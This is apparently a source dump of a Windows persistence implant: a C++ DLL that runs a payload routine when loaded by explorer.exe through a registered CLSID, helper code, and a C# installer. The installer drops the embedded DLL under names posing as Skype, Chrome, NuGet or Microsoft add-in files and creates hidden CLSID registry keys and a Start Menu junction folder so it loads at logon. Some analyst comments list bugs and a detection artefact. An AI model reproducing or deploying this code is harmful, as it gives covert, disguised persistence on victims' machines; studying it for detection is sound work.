76 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x64.Build.0 = Release|x64
77 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x86.ActiveCfg = Release|Win32
78 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x86.Build.0 = Release|Win32
79 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
80 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|Any CPU.Build.0 = Debug|Any CPU
81 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x64.ActiveCfg = Debug|Any CPU
82 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x64.Build.0 = Debug|Any CPU
83 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x86.ActiveCfg = Debug|Any CPU
84 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x86.Build.0 = Debug|Any CPU
85 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|Any CPU.ActiveCfg = Release|Any CPU
86 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|Any CPU.Build.0 = Release|Any CPU
87 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x64.ActiveCfg = Release|Any CPU
88 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x64.Build.0 = Release|Any CPU
89 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x86.ActiveCfg = Release|Any CPU
90 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x86.Build.0 = Release|Any CPU
91 | EndGlobalSection
92 | GlobalSection(SolutionProperties) = preSolution
93 | HideSolutionNode = FALSE
94 | EndGlobalSection
95 | GlobalSection(ExtensibilityGlobals) = postSolution
96 | SolutionGuid = {C9F20C8F-7983-40D3-8807-0486ECB12484}
97 | EndGlobalSection
98 | EndGlobal
99 |
--------------------------------------------------------------------------------
/ScatterBrain/Persistence.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "scatterbrain.h"
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | using namespace std;
12 |
13 | #define MAX_KEY_LENGTH 255
14 | #define MAX_VALUE_NAME 16383
15 |
16 | EXTERN_C IMAGE_DOS_HEADER __ImageBase;
17 |
18 | typedef unsigned __int64 QWORD;
19 |
// Returns TRUE when the current process's image name, as reported by a
// Toolhelp process snapshot, contains "verclsid.exe" or "explorer.exe";
// FALSE for any other host and on any snapshot/enumeration failure.
//
// Analyst notes: the handle returned by CreateToolhelp32Snapshot is never
// closed on any path, so every call leaks one handle. wcsstr is a substring
// test, so a name such as "myexplorer.exe" would also satisfy it.
bool IsHostPersistenceHost()
{
	HANDLE hSnapshot;
	PROCESSENTRY32 pe32;
	DWORD pid = GetCurrentProcessId();
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) return FALSE;

	ZeroMemory(&pe32, sizeof(pe32));
	pe32.dwSize = sizeof(pe32);
	if (!Process32First(hSnapshot, &pe32)) return FALSE;

	// Walk the snapshot until our own PID shows up; the decision is made
	// from that single entry and the remaining entries are never visited.
	do
	{
		if (pid == pe32.th32ProcessID)
		{
			if (wcsstr(pe32.szExeFile, L"verclsid.exe") || wcsstr(pe32.szExeFile, L"explorer.exe"))
			{
				return TRUE;
			}
			return FALSE;
		}
	} while (Process32Next(hSnapshot, &pe32));
	return FALSE;
}
45 |
// Main worker function that determines the CLSID
// the dll is loaded from then begins execution.
//
// What the body does, in order (hKey is expected to be an open handle to
// HKCU\Software\Classes\CLSID; it is closed before returning):
//  1. Resolves this module's own path via __ImageBase.
//  2. Enumerates every subkey of hKey and opens
//     HKCU\Software\Classes\CLSID\<subkey>\InprocServer32 read-only.
//  3. Reads the data of the value at enumeration index 0 (treated as the
//     InprocServer32 default, i.e. the DLL path) and, if it contains this DLL's
//     path, reads the value at enumeration index 3 as a DWORD (the code expects
//     it to be named "DateTime").
//  4. If that DWORD is 0, is greater than the current GetTickCount(), or is more
//     than one whole hour behind it, the key is reopened for writing, the value
//     whose name was returned by the index-3 enumeration is set (REG_DWORD) to
//     the current GetTickCount(), and MonsterMind() is called.
//  5. Stops after the first matching CLSID, whether or not it fired.
//
// Detection-relevant artefact: a REG_DWORD value named "DateTime" under the
// matching CLSID's InprocServer32 key, rewritten with the system tick count on
// each trigger.
//
// Analyst notes on defects, left as-is here:
//  - GetModuleFileNameW receives sizeof(currentDllPath) (a byte count) where a
//    character count is expected, so the buffer capacity is over-reported 2x.
//  - RegEnumValue value ordering is not guaranteed by the registry API; both the
//    index-0 and index-3 reads rely on it. dtValueNameSize is likewise a byte
//    count (18) for a 9-TCHAR buffer, so a longer value name at index 3 would
//    overrun dateTimeValueName.
//  - dllPath (new[]) and lpData (malloc) are never released; on the match path
//    the `break` skips the RegCloseKey(clsidKey) below it.
//  - GetTickCount() is documented to wrap after ~49.7 days, which the
//    `uptime < dateTime` test will then treat as a trigger.
void QueryCLSIDKeys(HKEY hKey)
{
	TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
	DWORD cbName; // size of name string
	TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name
	DWORD cchClassName = MAX_PATH; // size of class string
	DWORD cSubKeys = 0; // number of subkeys
	DWORD cbMaxSubKey; // longest subkey size
	DWORD cchMaxClass; // longest class string
	DWORD cValues; // number of values for key
	DWORD cchMaxValue; // longest value name
	DWORD cbMaxValueData; // longest value data
	DWORD cbSecurityDescriptor; // size of security descriptor
	FILETIME ftLastWriteTime; // last write time

	DWORD i, retCode;

	WCHAR currentDllPath[MAX_PATH] = { 0 };
	// NOTE(review): nSize is a character count; sizeof() yields bytes here.
	GetModuleFileNameW((HINSTANCE)&__ImageBase, currentDllPath, sizeof(currentDllPath));

	// Get the class name and the value count.
	retCode = RegQueryInfoKey(
		hKey, // key handle
		achClass, // buffer for class name
		&cchClassName, // size of class string
		NULL, // reserved
		&cSubKeys, // number of subkeys
		&cbMaxSubKey, // longest subkey size
		&cchMaxClass, // longest class string
		&cValues, // number of values for this key
		&cchMaxValue, // longest value name
		&cbMaxValueData, // longest value data
		&cbSecurityDescriptor, // security descriptor
		&ftLastWriteTime); // last write time

	// Enumerate the subkeys, until RegEnumKeyEx fails.
	// (retCode from RegQueryInfoKey is not checked; cSubKeys keeps its 0 initialiser on failure.)

	if (cSubKeys)
	{
		// printf("\nNumber of subkeys: %d\n", cSubKeys);

		for (i = 0; i < cSubKeys; i++)
		{
			cbName = MAX_KEY_LENGTH;
			retCode = RegEnumKeyEx(hKey, i,
				achKey,
				&cbName,
				NULL,
				NULL,
				NULL,
				&ftLastWriteTime);
			if (retCode == ERROR_SUCCESS)
			{
				//_tprintf(TEXT("(%d) %s\n"), i + 1, achKey);
				// Build HKCU-relative path of this CLSID's InprocServer32 key.
				WCHAR classGuidKey[MAX_VALUE_NAME];
				wsprintf(classGuidKey, L"Software\\Classes\\CLSID\\%s\\InprocServer32", achKey);
				//wprintf(L"Formatted new key: %s\n", classGuidKey);
				HKEY clsidKey;
				ZeroMemory(&clsidKey, sizeof(HKEY));
				if (RegOpenKeyEx(HKEY_CURRENT_USER,
					classGuidKey,
					0,
					KEY_READ,
					&clsidKey) == ERROR_SUCCESS)
				{
					TCHAR achValue[MAX_VALUE_NAME];
					DWORD cchValue = MAX_VALUE_NAME;
					achValue[0] = '\0';
					DWORD size = MAX_PATH;
					// Data of value index 0 is read raw into dllPath; `size` is a byte
					// count (MAX_PATH bytes), so only the first half of the buffer is used.
					WCHAR* dllPath = new WCHAR[MAX_PATH];
					retCode = RegEnumValue(clsidKey, 0,
						achValue,
						&cchValue,
						NULL,
						NULL,
						LPBYTE(dllPath),
						&size);
					if (retCode == ERROR_SUCCESS)
					{
						//wprintf(L"AchKey: %s\n", achKey);
						//wprintf(L"AchValue: %s\n", achValue);
						//wprintf(L"CLSID Dll path: %s\n", dllPath);
						//wprintf(L"Current DLL PATH: %s\n", currentDllPath);
						// Substring match: the registered DLL path contains our own path.
						// NOTE(review): assumes the REG_SZ data was NUL-terminated.
						if (wcsstr(dllPath, currentDllPath))
						{
							// We've found the path. Retrieve date-time value.
							//printf("Dlls match!\n");
							TCHAR dateTimeValueName[9];
							wsprintf(dateTimeValueName, L"%s", L"DateTime");
							DWORD dtValueNameSize = sizeof(dateTimeValueName);
							DWORD dateTime;
							DWORD dateTimeSize = sizeof(DWORD);
							// RegEnumValue overwrites dateTimeValueName with the actual name at
							// index 3; that name, not necessarily "DateTime", is what gets written below.
							retCode = RegEnumValue(clsidKey, 3,
								dateTimeValueName,
								&dtValueNameSize,
								NULL,
								NULL,
								LPBYTE(&dateTime),
								&dateTimeSize);
							if (retCode == ERROR_SUCCESS)
							{
								//printf("Parsed datetime: %d\n", dateTime);
								DWORD uptime = GetTickCount();
								const BYTE* lpData = (BYTE*)malloc(sizeof(DWORD));
								memcpy((void*)lpData, &uptime, sizeof(DWORD));
								// Ensure DLL
								// Fire when the stored tick count is unset, in the "future",
								// or more than one hour (integer hours) behind the current one.
								if (((uptime / 1000 / 60 / 60) - (dateTime / 1000 / 60 / 60)) > 1 ||
									dateTime == 0 ||
									uptime < dateTime)
								{
									// Make the dynamite go boom
									RegCloseKey(clsidKey);
									if (RegOpenKeyEx(HKEY_CURRENT_USER,
										classGuidKey,
										0,
										KEY_WRITE,
										&clsidKey) == ERROR_SUCCESS)
									{
										retCode = RegSetValueEx(
											clsidKey,
											dateTimeValueName,
											NULL,
											REG_DWORD,
											lpData,
											sizeof(DWORD)
										);
										if (retCode == ERROR_SUCCESS)
										{
											MonsterMind();
										}
									}
									else
									{

										//printf("Failed to open key for writing.\n");
									}
								}
								else
								{

								}

							}
							else
							{
								// printf("Failed to parse datetime.\n");
							}
							// printf("%d\n", retCode);
							// Leaves the for loop; the RegCloseKey(clsidKey) below is not reached.
							break;
						}
					}
					RegCloseKey(clsidKey);
				}
			}
		}
	}
	RegCloseKey(hKey);
}
206 |
// Entry point for the persistence check: opens HKCU\Software\Classes\CLSID
// read-only and hands the handle to QueryCLSIDKeys, which closes it.
// Silently does nothing if the key cannot be opened.
void InitializeBootProceedure()
{
	HKEY clsidKey;
	if (RegOpenKeyEx(HKEY_CURRENT_USER,
		TEXT("Software\\Classes\\CLSID"),
		0,
		KEY_READ,
		&clsidKey) == ERROR_SUCCESS)
	{
		QueryCLSIDKeys(clsidKey);
	}
}
--------------------------------------------------------------------------------
/ScatterBrain/Helpers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include "Helpers.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | using namespace std;
16 |
17 | typedef std::basic_string tstring;
18 |
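// Strips trailing characters for which `f` returns true from `s`, in place.
// Generic over the character type so the string/wstring overloads below can
// share it. `f` is called with one character and must return something
// usable as a bool. An empty string is left empty.
template <typename C, typename F>
void rtrimws(std::basic_string<C>& s, F f) {
	// Walk back from the end while the predicate holds, then cut there.
	typename std::basic_string<C>::size_type keep = s.size();
	while (keep > 0 && f(s[keep - 1]))
		--keep;
	s.erase(keep);
}

// Overloads to make cleaner calling for client code.
// isspace() has undefined behaviour for char values outside the unsigned char
// range (high-bit bytes in code-page text), so the char is widened through
// unsigned char first. iswspace() takes a wint_t, which wchar_t converts to.
void rtrimws(std::string& s) {
	rtrimws(s, [](char c) { return std::isspace(static_cast<unsigned char>(c)) != 0; });
}

void rtrimws(std::wstring& ws) {
	rtrimws(ws, [](wchar_t c) { return std::iswspace(c) != 0; });
}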
42 |
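// Converts a NUL-terminated ANSI (CP_ACP) string to a newly allocated wide
// string. The caller owns the result and must release it with delete[].
// If the conversion fails the returned buffer holds an empty string instead
// of uninitialised memory.
wchar_t* CharToWcharT(char* charString)
{
	// +1 so the terminating NUL is converted as well; one wchar_t per input
	// byte is an upper bound on the output length.
	size_t sz = strlen(charString) + 1;
	wchar_t* path = new wchar_t[sz];
	int written = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, charString,
		static_cast<int>(sz), path, static_cast<int>(sz));
	if (written == 0)
	{
		// MultiByteToWideChar reports failure with 0; make the result well-formed.
		path[0] = L'\0';
	}
	return path;
}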
50 |
51 | //https://stackoverflow.com/questions/48345108/determine-all-posible-applications-to-open-a-file-with-delegateexecute?rq=1
52 | //wchar_t* GetDefaultHandlerForExtension(LPCTSTR extension)
53 | //{
54 | // IEnumAssocHandlers *pEnumHandlers = NULL;
55 | // if (SUCCEEDED(SHAssocEnumHandlers(extension, ASSOC_FILTER_RECOMMENDED, &pEnumHandlers)))
56 | // {
57 | // IAssocHandler *pAssocHandler = NULL;
58 | // while (S_OK == pEnumHandlers->Next(1, &pAssocHandler, NULL))
59 | // {
60 | // if (pAssocHandler != NULL)
61 | // {
62 | // LPWSTR pszName;
63 | // LPWSTR pszUIName;
64 | // LPWSTR ppszPath;
65 | // int pIndex;
66 | //
67 | // pAssocHandler->GetUIName(&pszName);
68 | // pAssocHandler->GetName(&pszUIName);
69 | // pAssocHandler->GetIconLocation(&ppszPath, &pIndex);
70 | // pAssocHandler->Release();
71 | // pAssocHandler = NULL;
72 | //
73 | // printf_s("%S \n", pszUIName);
74 | // printf_s("%S \n", pszName);
75 | // }
76 | // }
77 | // pEnumHandlers->Release();
78 | //
79 | // scanf_s("%S");
80 | // }
81 | // return NULL;
82 | //}
83 |
// Reports whether `fileName` exists on disk and GetBinaryTypeW classifies it
// as a 64-bit executable image. Prints a status line only on the positive path.
bool FileExistsAndIs64Bit(wchar_t* fileName)
{
	struct _stat st;
	if (_wstat(fileName, &st) != 0)
	{
		return FALSE;
	}

	DWORD binaryType;
	bool is64 = GetBinaryTypeW(fileName, &binaryType) && binaryType == SCS_64BIT_BINARY;
	if (is64)
	{
		wprintf(L"[*] %s exists and is 64-bit!\n", fileName);
	}
	return is64;
}
100 |
// Narrow-string twin of the wide overload: true when `fileName` exists and
// GetBinaryTypeA classifies it as a 64-bit executable image.
bool FileExistsAndIs64Bit(char* fileName)
{
	struct _stat st;
	if (_stat(fileName, &st) != 0)
	{
		return FALSE;
	}

	DWORD binaryType;
	bool is64 = GetBinaryTypeA(fileName, &binaryType) && binaryType == SCS_64BIT_BINARY;
	if (is64)
	{
		printf("[*] %s exists and is 64-bit!\n", fileName);
	}
	return is64;
}
116 |
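// Maps Volumes to disk paths
//
// Returns the multi-string (double-NUL-terminated list) of mount paths that
// GetVolumePathNamesForVolumeNameW reports for `VolumeName` (e.g. "C:\\"), or
// NULL if the lookup fails. The caller owns the returned buffer and must
// release it with delete[].
PWCHAR GetVolumePaths(
	__in PWCHAR VolumeName
)
{
	DWORD CharCount = MAX_PATH + 1;
	PWCHAR Names = NULL;

	for (;;)
	{
		// Allocate as WCHAR so the type matches the delete[] the caller performs.
		// operator new[] throws rather than returning NULL, so no NULL check here.
		Names = new WCHAR[CharCount];

		// On success the buffer is handed to the caller as-is.
		if (GetVolumePathNamesForVolumeNameW(VolumeName, Names, CharCount, &CharCount))
		{
			return Names;
		}

		// ERROR_MORE_DATA means CharCount now holds the required size: retry
		// with that size. Any other error ends the loop.
		if (GetLastError() != ERROR_MORE_DATA)
		{
			break;
		}

		delete[] Names;
		Names = NULL;
	}

	// Failure path: release the buffer from the last attempt.
	delete[] Names;
	return NULL;
}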
187 |
188 |
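// Maps a device volume path to a filepath,
// like \Device\Harddisk4\Windows\System32\cmd.exe --> C:\Windows\System32\cmd.exe
//
// Enumerates every volume, resolves its \Device\... name with QueryDosDeviceW
// and, for the first volume whose device name is the leading component of
// `path` (followed by a backslash), replaces that prefix with the volume's
// first mount path (e.g. "C:\") and copies the result into `out`. No bound for
// `out` is available here; the caller must size it for the result. On any
// failure `out` is left untouched and a message is printed.
void TranslateVolumeToPath(LPCWSTR path, WCHAR* out)
{
	DWORD CharCount = 0;
	WCHAR DeviceName[MAX_PATH] = L"";
	DWORD Error = ERROR_SUCCESS;
	HANDLE FindHandle = INVALID_HANDLE_VALUE;
	size_t Index = 0;
	BOOL Success = FALSE;
	WCHAR VolumeName[MAX_PATH] = L"";

	//
	// Enumerate all volumes in the system.
	FindHandle = FindFirstVolumeW(VolumeName, ARRAYSIZE(VolumeName));

	if (FindHandle == INVALID_HANDLE_VALUE)
	{
		Error = GetLastError();
		wprintf(L"FindFirstVolumeW failed with error code %lu\n", Error);
		return;
	}

	for (;;)
	{
		//
		// Skip the \\?\ prefix and remove the trailing backslash.
		Index = wcslen(VolumeName) - 1;

		if (VolumeName[0] != L'\\' ||
			VolumeName[1] != L'\\' ||
			VolumeName[2] != L'?' ||
			VolumeName[3] != L'\\' ||
			VolumeName[Index] != L'\\')
		{
			Error = ERROR_BAD_PATHNAME;
			wprintf(L"FindFirstVolumeW/FindNextVolumeW returned a bad path: %s\n", VolumeName);
			break;
		}

		//
		// QueryDosDeviceW does not allow a trailing backslash,
		// so temporarily remove it.
		VolumeName[Index] = L'\0';

		CharCount = QueryDosDeviceW(&VolumeName[4], DeviceName, ARRAYSIZE(DeviceName));

		VolumeName[Index] = L'\\';

		if (CharCount == 0)
		{
			Error = GetLastError();
			wprintf(L"QueryDosDeviceW failed with error code %lu\n", Error);
			break;
		}

		// Match only when the device name is the leading path component, i.e. it
		// is followed by a separator. A plain substring test would also accept
		// \Device\HarddiskVolume1 as a prefix of \Device\HarddiskVolume10, and
		// would match a device name appearing anywhere inside the path.
		size_t deviceLen = wcslen(DeviceName);
		if (deviceLen > 0 &&
			wcsncmp(path, DeviceName, deviceLen) == 0 &&
			path[deviceLen] == L'\\')
		{
			PWCHAR drive = GetVolumePaths(VolumeName);
			if (drive == NULL || drive[0] == L'\0')
			{
				// No mount path for this volume (or lookup failed): keep looking.
				wprintf(L"Couldn't translate %s to a drive. FAILED.\n", path);
				delete[] drive;
			}
			else
			{
				// Replace "<device>\" with the volume's first mount path, which
				// already carries its own trailing backslash (e.g. "C:\").
				std::wstring temp = path;
				temp.replace(0, deviceLen + 1, drive);
				delete[] drive;
				FindVolumeClose(FindHandle);
				FindHandle = INVALID_HANDLE_VALUE;
				StrCpyW(out, temp.c_str());
				return;
			}
		}

		//
		// Move on to the next volume.
		Success = FindNextVolumeW(FindHandle, VolumeName, ARRAYSIZE(VolumeName));

		if (!Success)
		{
			Error = GetLastError();

			if (Error != ERROR_NO_MORE_FILES)
			{
				wprintf(L"FindNextVolumeW failed with error code %lu\n", Error);
				break;
			}

			//
			// Finished iterating
			// through all the volumes.
			Error = ERROR_SUCCESS;
			break;
		}
	}

	FindVolumeClose(FindHandle);
	FindHandle = INVALID_HANDLE_VALUE;

	return;
}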
301 |
--------------------------------------------------------------------------------
/DWELLS/DWELLS.vcxproj:
--------------------------------------------------------------------------------
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}
24 | Win32Proj
25 | DWELLS
26 | 10.0.17763.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Use
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | MultiThreaded
96 |
97 |
98 | Console
99 | true
100 | true
101 | true
102 | Resource.rc;
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 |
114 |
115 | Windows
116 | true
117 |
118 |
119 |
120 |
121 | Use
122 | Level3
123 | Disabled
124 | true
125 | _DEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 |
128 |
129 | Windows
130 | true
131 |
132 |
133 |
134 |
135 | Use
136 | Level3
137 | MaxSpeed
138 | true
139 | true
140 | true
141 | WIN32;NDEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
142 | true
143 |
144 |
145 | Windows
146 | true
147 | true
148 | true
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 | Create
162 | Create
163 | Create
164 | Create
165 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 | using Microsoft.Win32;
7 |
8 | namespace AccessibilityFeaturesPersistence
9 | {
10 | class Program
11 | {
12 | static string TechnologyName;
13 |
/// <summary>
/// Recursively deletes <paramref name="target_dir"/>. Every file is first reset
/// to <see cref="FileAttributes.Normal"/> so read-only files do not block the
/// delete, subdirectories are removed the same way, and finally the now-empty
/// directory itself is deleted.
/// </summary>
/// <param name="target_dir">Directory to delete; must exist.</param>
public static void DeleteDirectory(string target_dir)
{
    string[] files = Directory.GetFiles(target_dir);
    string[] dirs = Directory.GetDirectories(target_dir);

    Array.ForEach(files, file =>
    {
        File.SetAttributes(file, FileAttributes.Normal);
        File.Delete(file);
    });

    Array.ForEach(dirs, DeleteDirectory);

    // Contents are gone, so a non-recursive delete suffices.
    Directory.Delete(target_dir, false);
}
32 |
33 | static void UninstallProgram(string comGuid)
34 | {
35 | Console.WriteLine("[*] Removing {0}", comGuid);
36 | string comGuidRegPath = "Software\\Classes\\CLSID\\" + comGuid;
37 | string inProc32Path = comGuidRegPath + "\\InprocServer32";
38 | RegistryKey inProcKey = Registry.CurrentUser.OpenSubKey(inProc32Path);
39 | var dllPathObj = inProcKey.GetValue("");
40 | var companyObj = inProcKey.GetValue("Company");
41 | string dllPath = dllPathObj.ToString();
42 | string junctionFolder = Environment.GetEnvironmentVariable("APPDATA") + "\\" + companyObj.ToString();
43 | try
44 | {
45 | Console.Write("[*] Attempting to delete {0}... ", dllPath);
46 | File.Delete(dllPath);
47 | Console.WriteLine("Done.");
48 | }
49 | catch (Exception ex)
50 | {
51 | Console.WriteLine("FAILURE.\n[-] Reason: {0}", ex.Message);
52 | }
53 | try
54 | {
55 | Console.Write("[*] Attempting to delete registry tree: {0}... ", comGuidRegPath);
56 | Registry.CurrentUser.DeleteSubKeyTree(comGuidRegPath);
57 | Console.WriteLine("Done.");
58 | }
59 | catch (Exception ex)
60 | {
61 | Console.WriteLine("FAILURE.");
62 | Console.WriteLine("Reason:");
63 | Console.WriteLine(ex);
64 | }
65 | try
66 | {
67 | Console.Write("[*] Attempting to delete {0}... ", junctionFolder);
68 | DeleteDirectory(junctionFolder);
69 | Console.WriteLine("Done.");
70 | }
71 | catch (Exception ex)
72 | {
73 | Console.WriteLine("FAILURE.");
74 | Console.WriteLine("Reason:");
75 | Console.WriteLine(ex);
76 | }
77 | Console.WriteLine("[*] All Done.");
78 | }
79 |
80 | static void InstallProgram()
81 | {
82 | string dllPath = "";
83 | try
84 | {
85 | dllPath = CreateDLL();
86 | }
87 | catch (Exception ex)
88 | {
89 | Console.WriteLine("[-] Error creating DLL. Stack trace:");
90 | Console.WriteLine(ex);
91 | Console.Write("\nAborting.");
92 | Environment.Exit(1);
93 | }
94 | Console.WriteLine("[*] File created: {0}", dllPath);
95 | Guid comGuid = Guid.NewGuid();
96 | Console.WriteLine("[*] Using GUID: {" + comGuid.ToString() + "}");
97 | if (CreateRegistryKeys(comGuid.ToString(), dllPath))
98 | {
99 | Console.WriteLine("[*] Registry updated with CLSID: {" + comGuid.ToString() + "}");
100 | string junctionDir = CreateJunctionFolder(comGuid.ToString());
101 | Console.WriteLine("[+] All done!");
102 | }
103 | else
104 | {
105 | Console.WriteLine("[-] Error creating registry keys. Rerun the assembly with 'uninstall {guid}' flag.");
106 |
107 | Environment.Exit(1);
108 | }
109 | }
110 |
111 | static bool CreateRegistryKeys(string comGuid, string dllPath)
112 | {
113 | try
114 | {
115 | string comGuidRegPath = "Software\\Classes\\CLSID\\{" + comGuid + "}";
116 | string inProc32Path = comGuidRegPath + "\\InprocServer32";
117 | string shellFolderPath = comGuidRegPath + "\\ShellFolder";
118 | RegistryKey inProcKey;
119 | Registry.CurrentUser.CreateSubKey(comGuidRegPath);
120 | inProcKey = Registry.CurrentUser.CreateSubKey(inProc32Path);
121 | inProcKey.SetValue("", dllPath);
122 | inProcKey.SetValue("ThreadingModel", "Apartment");
123 | inProcKey.SetValue("LoadWithoutCOM", "");
124 | inProcKey.SetValue("DateTime", 0, RegistryValueKind.DWord);
125 | inProcKey.SetValue("Company", TechnologyName);
126 | RegistryKey shellFolderKey = Registry.CurrentUser.CreateSubKey(shellFolderPath);
127 | shellFolderKey.SetValue("HideOnDesktop", "", RegistryValueKind.String);
128 | uint attr = (uint)(0xf090013d);
129 | shellFolderKey.SetValue("Attributes", (int)attr, RegistryValueKind.DWord);
130 | inProcKey.Close();
131 | shellFolderKey.Close();
132 | }
133 | catch (Exception ex)
134 | {
135 | Console.WriteLine("[-] Error creating registry keys. Stack trace:");
136 | Console.WriteLine(ex);
137 | return false;
138 | }
139 | return true;
140 | }
141 |
142 | static string CreateJunctionFolder(string guid)
143 | {
144 | string appDataPath = Environment.GetEnvironmentVariable("APPDATA");
145 | string appPath = appDataPath + "\\Microsoft\\Windows\\Start Menu\\Programs\\";
146 | string techPath = appPath + TechnologyName + ".{" + guid + "}";
147 | try
148 | {
149 | Directory.CreateDirectory(techPath);
150 | Console.WriteLine("[+] Created {0}", techPath);
151 | return techPath;
152 | }
153 | catch (Exception ex)
154 | {
155 | Console.WriteLine("[-] Error creating junction directory.");
156 | return "";
157 | }
158 | }
159 |
160 | static string CreateDLL()
161 | {
162 | string tempPath = Environment.GetEnvironmentVariable("APPDATA");
163 | string dllPath = "";
164 | string msftAddinDirectory = tempPath + "\\Microsoft\\AddIns\\";
165 | string skypeDirectory = tempPath + "\\Skype\\RootTools\\";
166 | string nugetPath = tempPath + "\\NuGet\\";
167 | string chromeUserDataDirectory = tempPath + "\\Google\\Chrome\\User Data\\";
168 | if (Directory.Exists(skypeDirectory))
169 | {
170 | dllPath = skypeDirectory + "roottools.dll";
171 | TechnologyName = "Skype";
172 | }
173 | else if (Directory.Exists(chromeUserDataDirectory))
174 | {
175 | dllPath = chromeUserDataDirectory + "userutils.dll";
176 | TechnologyName = "Google";
177 | }
178 | else if (Directory.Exists(nugetPath))
179 | {
180 | dllPath = nugetPath + "NuGet.dll";
181 | TechnologyName = "NuGet";
182 | }
183 | else if (Directory.Exists(msftAddinDirectory))
184 | {
185 | dllPath = msftAddinDirectory + "AccessibilityFeatures.dll";
186 | TechnologyName = "MicrosoftAddins";
187 | }
188 | else
189 | {
190 | dllPath = tempPath + "\\AccessibilityFeatures.dll";
191 | TechnologyName = "AccessbilityFeatures";
192 | }
193 | File.WriteAllBytes(dllPath, Properties.Resources.ScatterBrain);
194 | return dllPath;
195 | }
196 |
197 | static void DeleteFile()
198 | {
199 | string tempPath = Environment.GetEnvironmentVariable("APPDATA");
200 | string dllPath = "";
201 | string msftAddinDirectory = tempPath + "\\Microsoft\\AddIns\\";
202 | string skypeDirectory = tempPath + "\\Skype\\RootTools\\";
203 | string nugetPath = tempPath + "\\NuGet\\";
204 | string chromeUserDataDirectory = tempPath + "\\Google\\Chrome\\User Data\\";
205 | if (Directory.Exists(skypeDirectory))
206 | {
207 | dllPath = skypeDirectory + "roottools.dll";
208 | }
209 | else if (Directory.Exists(chromeUserDataDirectory))
210 | {
211 | dllPath = chromeUserDataDirectory + "userutils.dll";
212 | }
213 | else if (Directory.Exists(nugetPath))
214 | {
215 | dllPath = nugetPath + "NuGet.dll";
216 | }
217 | else if (Directory.Exists(msftAddinDirectory))
218 | {
219 | dllPath = msftAddinDirectory + "AccessibilityFeatures.dll";
220 | }
221 | else
222 | {
223 | dllPath = tempPath + "\\AccessibilityFeatures.dll";
224 | }
225 | if (dllPath != "")
226 | {
227 | File.Delete(dllPath);
228 | Console.WriteLine("[*] Deleted {0}", dllPath);
229 | }
230 | else
231 | {
232 | Console.WriteLine("[-] Could not find dll.");
233 | }
234 | }
235 |
236 | static void Usage()
237 | {
238 | string usage = @"
239 | Usage:
240 | Arguments:
241 | install - Installs the agent.
242 | uninstall {CLSID} - Uninstalls the given CLSID.
243 |
244 | Examples:
245 | .\AccessibilityFeaturesPersistence.exe install
246 | .\AccessibilityFeaturesPersistence.exe uninstall ""{a3df199e-bc97-4c87-ada6-4b5287a0d9e5}""
247 | ";
248 | Console.WriteLine(usage);
249 | }
250 |
251 | static void Main(string[] args)
252 | {
253 | if (args.Length == 0 || args.Length > 2)
254 | {
255 | Usage();
256 | Environment.Exit(0);
257 | }
258 | else if (args[0] == "install")
259 | {
260 | InstallProgram();
261 | }
262 | else if (args[0] == "uninstall" && args.Length == 2)
263 | {
264 | if (args[1].Length != 38)
265 | {
266 | Console.WriteLine("[-] Error parsing CLSID. Must be of the form: {CLSID}");
267 | Environment.Exit(1);
268 | }
269 | UninstallProgram(args[1]);
270 | }
271 | else
272 | {
273 | Usage();
274 | Environment.Exit(1);
275 | }
